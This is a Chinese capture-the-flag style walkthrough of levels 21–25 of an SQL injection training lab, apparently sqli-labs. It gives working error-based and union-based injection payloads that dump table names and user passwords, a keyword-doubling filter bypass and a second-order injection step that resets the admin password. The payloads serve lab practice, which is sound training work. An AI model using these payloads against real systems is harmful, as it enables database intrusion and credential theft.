第21关
一.登录页面
二 .Burp Suite 抓包,进入重放器
三.查询数据库 先辈行编码
')and updatexml(1,concat(1,database()),1)#
四.查表,先辈行编码
')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
五.查列,先辈行编码
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
六.查询users表中所有数据
')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
第22关
一.登录页面
二 .Burp Suite 抓包,进入重放器
三.查询数据库 先辈行编码
"and updatexml(1,concat(1,database()),1)#
四.查表,先辈行编码
"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
五.查列,先辈行编码
"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
六.查询users表中所有数据
"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
第23关
一.看有无回显点
二查询数据库
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271
三.查表
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271
四.查列
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271
第24关
使用二次注入
一.注册用户
二.admin的密码被修改为777777
第25关
一.闭合方式为 单引号 '
http://127.0.0.1/Less-25/?id=1%27%20--+http://127.0.0.1/Less-25/?id=1%27%20--+
二.查询数据库
http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+
三. 查询库中所有表
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+
四.查询列
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |